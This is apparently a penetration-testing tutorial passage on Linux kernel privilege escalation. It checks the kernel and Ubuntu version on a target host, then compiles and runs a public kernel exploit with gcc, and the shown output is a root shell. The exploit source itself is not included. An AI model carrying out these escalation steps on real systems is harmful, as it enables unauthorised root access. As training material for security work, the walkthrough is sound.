Note: Kernel exploits can cause system instability so use caution when running these against a production system.
Let's start by checking the Kernel level and Linux OS version.
Attacker@xxx[/xxx]$ uname -a
Linux NIX02 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/LinuxAttacker@xxx[/xxx]$ cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.4 LTS"We can see that we are on Linux Kernel 4.4.0-116 on an Ubuntu 16.04.4 LTS box. A quick Google search for linux 4.4.0-116-generic exploit comes up with this exploit PoC. Next download, it to the system using wget or another file transfer method. We can compile the exploit code using gcc and set the executable bit using chmod +x.
Attacker@xxx[/xxx]$ gcc kernel_exploit.c -o kernel_exploit && chmod +x kernel_exploitNext, we run the exploit and hopefully get dropped into a root shell.
Attacker@xxx[/xxx]$ ./kernel_exploit
task_struct = ffff8800b71d7000
uidptr = ffff8800b95ce544
spawning root shellFinally, we can confirm root access to the box.
root@xxx[/xxx]# whoami
root